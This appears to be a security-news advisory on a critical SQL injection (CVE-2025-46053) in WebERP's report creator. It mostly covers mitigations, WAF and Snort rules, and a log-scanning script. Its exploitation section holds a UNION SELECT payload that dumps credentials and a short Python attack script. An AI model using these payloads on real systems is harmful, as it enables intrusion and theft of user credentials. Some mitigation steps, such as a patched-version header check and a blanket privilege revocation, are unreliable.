WebERP, SQL Injection, CVE-2025-46053 (Critical)


How the Vulnerability Works

CVE-2025-46053 is a critical SQL Injection flaw in WebERP v4.15.2 that allows attackers to manipulate database queries via the `ReportID` and `ReplaceReportID` parameters of /reportwriter/admin/ReportCreator.php. The application fails to sanitize user-supplied input before concatenating it into SQL queries. Attackers can craft malicious POST requests with payloads such as `' OR 1=1--` to bypass authentication, dump database contents, or execute arbitrary commands. The vulnerability stems from improper input validation in the report generation module, where attacker-controlled parameters are embedded directly into dynamic SQL statements without prepared statements or parameterized queries.

DailyCVE Form

Platform: WebERP
Version: 4.15.2
Vulnerability: SQL Injection
Severity: Critical
Date: 06/12/2025

Prediction: Patch expected by 07/10/2025

What Undercode Say:

Exploitation

1. Craft Malicious POST Request:

POST /reportwriter/admin/ReportCreator.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
ReportID=1' UNION SELECT username,password FROM users--&ReplaceReportID=1

2. Automated Exploit (Python):

import requests
target = "http://victim.com/reportwriter/admin/ReportCreator.php"
payload = {"ReportID": "1' UNION SELECT 1,@@version--", "ReplaceReportID": "1"}
r = requests.post(target, data=payload)
print(r.text)

Protection

1. Input Sanitization:

// Escaping only protects values placed inside quoted string literals; an unquoted
// numeric id still needs an integer cast or, better, a prepared statement (step 2).
$reportID = mysqli_real_escape_string($conn, $_POST['ReportID']);

2. Use Prepared Statements:

$reportID = (int) $_POST['ReportID'];   // cast keeps only the numeric id
$stmt = $conn->prepare("SELECT * FROM reports WHERE id = ?");
$stmt->bind_param("i", $reportID);      // value is bound, never concatenated into the query
$stmt->execute();

3. WAF Rules (ModSecurity):

SecRule ARGS "@detectSQLi" "id:1000,phase:2,deny,status:403,log,msg:'SQL injection attempt in request arguments'"

4. Patch Verification:

curl -I http://target.com/ | grep X-Patched-Version

5. Database Hardening:

REVOKE ALL PRIVILEGES ON *.* FROM 'weberp_user'@'%';

6. Log Analysis Command:

grep "POST /reportwriter/admin" /var/log/apache2/access.log | grep -E "UNION|SELECT|--"

7. Mitigation Workaround:

location /reportwriter/admin {
    deny all;
}

8. Exploit Detection (Snort Rule):

alert tcp any any -> $HOME_NET 80 (msg:"WebERP SQLi Attempt"; flow:to_server,established; content:"ReportID="; nocase; pcre:"/UNION\s+SELECT/i"; classtype:web-application-attack; sid:1000001; rev:1;)
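The log-analysis and Snort steps above (items 6 and 8) only see payloads that appear in the logged request line, and Apache's default access log does not record POST bodies, so a body-borne payload is only visible there if it also travels in the query string or a ModSecurity audit log is enabled. The following script is an added example, not code from the original post or from WebERP: it parses constructed Apache combined-log lines, URL-decodes the two watched parameters repeatedly so double-encoded payloads are caught, and flags ReportCreator.php requests carrying the injection patterns this post names.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample lines in Apache combined-log format (not real traffic).
# Line 3 carries a double-encoded payload (%2527 -> %27 -> ') that a plain grep misses.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jun/2025:10:01:02 +0000] "POST /reportwriter/admin/ReportCreator.php?ReportID=1%27%20UNION%20SELECT%20username%2Cpassword%20FROM%20users--&ReplaceReportID=1 HTTP/1.1" 200 512 "-" "curl/8.0"
203.0.113.8 - - [12/Jun/2025:10:01:05 +0000] "GET /reportwriter/admin/ReportCreator.php?ReportID=7 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Jun/2025:10:02:11 +0000] "GET /reportwriter/admin/ReportCreator.php?ReportID=1%2527%2520OR%25201%253D1-- HTTP/1.1" 500 0 "-" "python-requests/2.31"
203.0.113.9 - - [12/Jun/2025:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Fields of a combined-log line that the scan needs: client IP, timestamp, method, request target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Patterns named in the post (UNION SELECT, tautology, comment terminators, @@version).
SQLI_RE = re.compile(r"(union\s+select|'\s*or\s+\d+\s*=\s*\d+|--|/\*|@@version|information_schema)", re.I)
WATCHED = ("ReportID", "ReplaceReportID")
TARGET_PATH = "/reportwriter/admin/ReportCreator.php"


def decode_fully(value, rounds=3):
    """URL-decode until stable (bounded), so %2527-style double encoding is unwrapped."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_log(text):
    """Return (ip, timestamp, parameter, decoded_value) for each suspicious ReportCreator request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log line; skip rather than crash on junk
        parts = urlsplit(m.group("path"))
        if not parts.path.endswith(TARGET_PATH):
            continue
        # parse_qs already decodes one layer; decode_fully handles any further layers.
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            if name not in WATCHED:
                continue
            for raw in values:
                decoded = decode_fully(raw)
                if SQLI_RE.search(decoded):
                    hits.append((m.group("ip"), m.group("ts"), name, decoded))
    return hits
```

Run it against a real log with `scan_log(open("/var/log/apache2/access.log").read())`; each hit is a candidate for the WAF or Snort rules above, and the 500 status on a flagged request is worth correlating with the database error log.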

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
